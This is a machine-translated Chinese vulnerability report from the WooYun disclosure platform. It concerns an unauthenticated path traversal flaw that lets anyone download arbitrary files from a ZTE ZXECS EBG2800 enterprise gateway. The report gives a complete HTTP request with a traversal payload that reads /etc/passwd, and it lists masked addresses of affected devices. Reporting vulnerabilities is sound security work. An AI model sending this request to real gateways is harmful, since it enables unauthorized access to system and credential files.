漏洞标题 中兴通讯企业业务网关系统设备通用任意文件遍历下载(无需登录) 相关制造商 中兴通讯 漏洞作者 YY-2012 提交时间 2016-03-27 08: 14 公共时间 2016-06-26 09: 10 漏洞类型 任何文件遍历/下载 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 任何文件读取 漏洞详细信息 ZXECS EBG2800企业服务网关系统 任何文件遍历下载 GET /download.php?id=./././././etc/passwd&mtype=2&atype=voice HTTP/1.1 主机: **。**。**。** 连接:关闭 接受: text/html,application/xhtml + xml,application/xml; q=0.9,image/webp,*/*; q=0.8 升级 - 不安全请求: 1 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/46.0.2490.86 Safari/537.36 Referer:https://**。**。**。**/modules/service/voip_soundmanager.php?path=/voip_service/voip_basicset/voip_soundmanage Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh; q=0.8 Cookie: PHPSESSID=; select_lang=schinese专栏;语言=1 漏洞证明:
随机20例: ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / 修理计划: 你懂。 版权声明:请注明出处YY-2012 @乌云